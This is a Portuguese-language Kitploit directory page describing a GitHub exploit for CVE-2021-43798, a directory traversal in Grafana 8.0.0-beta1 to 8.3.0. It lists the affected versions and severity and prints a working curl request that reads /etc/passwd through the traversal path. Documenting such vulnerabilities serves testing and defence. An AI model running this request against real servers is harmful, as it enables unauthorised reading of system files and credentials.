Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-43798 — Exploit para traversal de diretório no Grafana (CVE-2021-43798) que permite leitura não autorizada de arquivos por meio de requisições HTTP maliciosas. | Kitploit
Ferramentas/GitHubGitHub/shoxake17/cve-2021-43798
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubshoxake17/cve-2021-43798

CVE-2021-43798

Exploit para traversal de diretório no Grafana (CVE-2021-43798) que permite leitura não autorizada de arquivos por meio de requisições HTTP maliciosas.

Ver Repositório
2há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-43798 por Privacy Hunter

Versões afetadas: Grafana 8.0.0-beta1 até 8.3.0 (excluindo versões corrigidas)

Tipo de vulnerabilidade: Directory Traversal (Percursos de Diretório)

Nível de impacto: Crítico (Critical)

Plataforma: Grafana (plataforma de monitoramento e observabilidade open-source)

⚠️ Detalhes da Vulnerabilidade No Grafana, é possível realizar um Directory Traversal através da seguinte URL:

Code http://<grafana_host>/public/plugins// Com isso, um atacante pode ler arquivos locais no servidor. Por exemplo, /etc/passwd ou arquivos de configuração, obtendo acesso não autorizado.

🔥 Exemplo de Exploração Leitura de arquivo através de uma simples requisição:

bash curl http://target:3000/public/plugins/alertlist/../../../../../../../../etc/passwd A requisição acima permite obter a lista de usuários do sistema Linux.

Baixar ferramenta